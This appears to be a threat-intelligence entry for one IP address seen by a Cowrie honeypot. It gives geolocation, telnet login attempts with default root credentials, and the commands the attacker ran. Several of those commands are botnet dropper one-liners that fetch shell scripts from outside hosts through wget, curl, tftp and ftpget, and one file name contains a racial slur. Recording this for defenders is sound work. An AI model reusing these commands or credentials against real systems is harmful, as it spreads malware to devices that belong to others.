Active Threat • MEDIUM
176.65.139.16
- Total Attacks: 31
- Ports: 1
- Attack Types: 1
- Malware: 3
Geolocation
- Country: 🇸🇬 Singapore
- City: Unknown
- ASN: AS16276
- ISP: OVH SAS
Attack Types
- cowrie
Attacked Ports
- 23
Associated Malware
Attempted Credentials
- 2x: root/root
- 1x: root/1234
Executed Commands
- 3x: $ uname -m
- 1x: $ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:8080/ez_nigger_xdd.sh || curl -O http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox wget http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox tftp 48.200.96.137 -c get ez_nigger_xdd.sh || busybox tftp -r ez_nigger_xdd.sh -g 48.200.96.137 -l ez_nigger_xdd.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 ez_nigger_xdd.sh ez_nigger_xdd.sh || tftp 48.200.96.137 -c get ez_nigger_xdd.sh || tftp -r
- 1x: $ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:666/payload.sh || curl -O http://48.200.96.137:666/payload.sh || busybox wget http://48.200.96.137:666/payload.sh || busybox tftp 48.200.96.137 -c get payload.sh || busybox tftp -r payload.sh -g 48.200.96.137 -l payload.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 payload.sh payload.sh || tftp 48.200.96.137 -c get payload.sh || tftp -r payload.sh -g 48.200.96.137 -l payload.sh || ftpget -v -u
- 1x: $ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all
Risk Assessment
40/100
Low / Medium / High / Critical